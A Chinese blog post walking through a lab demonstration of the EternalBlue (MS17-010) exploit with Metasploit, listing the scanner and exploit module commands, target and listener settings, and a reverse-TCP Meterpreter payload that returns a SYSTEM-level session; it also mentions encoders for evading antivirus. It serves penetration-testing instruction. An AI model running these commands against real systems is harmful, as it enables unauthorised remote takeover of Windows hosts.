msf-永恒之蓝利用演示

使用Msf演示永恒之蓝漏洞的利用过程

MSF的功能模块介绍
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程

1、Auxiliary(辅助模块)
为渗透测试信息搜集提供了大量的辅助模块支持
2、Exploits(攻击模块)
利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
3、Payload(攻击载荷模块)
攻击成功后促使靶机运行的一段植入代码
4、Post (后渗透攻击模块)
收集更多信息或进一步访问被利用的目标系统
5、Encoders(编码模块)
将攻击载荷进行编码,来绕过防护软件拦截

 

永恒之蓝漏洞演示:

靶机网络信息

攻击机网络信息

 

连通性测试

 

msf数据库启用

启动

永恒之蓝漏洞测试

永恒之蓝的漏洞编号:ms17-010

根据漏洞名称搜索 : search ms17_010

 

辅助模块扫描目标
设置模块:use auxiliary/scanner/smb/smb_ms17_010

查看设置:options

 


设置所需信息

设置目标地址:set rhosts 192.168.174.129

目标端口默认是445,
如果用nmap端口扫描windows文件共享服务不是开放在445端口上面,那这里需要进行修改,set rport 目标端口

设置好了之后,run或者exploit 进行攻击

绿色的加号为可攻击

2、设置攻击模块对目标进行攻击
使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:options

设置所需信息:

设置目标地址:set RHOSTS 192.168.48.219

设置目标端口:set RPORT 445

设置payload:set payload windows/x64/meterpreter/reverse_tcp

设置本地地址:set LHOST 192.168.48.140

 

攻击:run或者exploit
 

攻击成功,成功拿到会话

查看目前权限 gutuid

系统权限

posted @   小吕不忧伤  阅读(157)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!
点击右上角即可分享
微信分享提示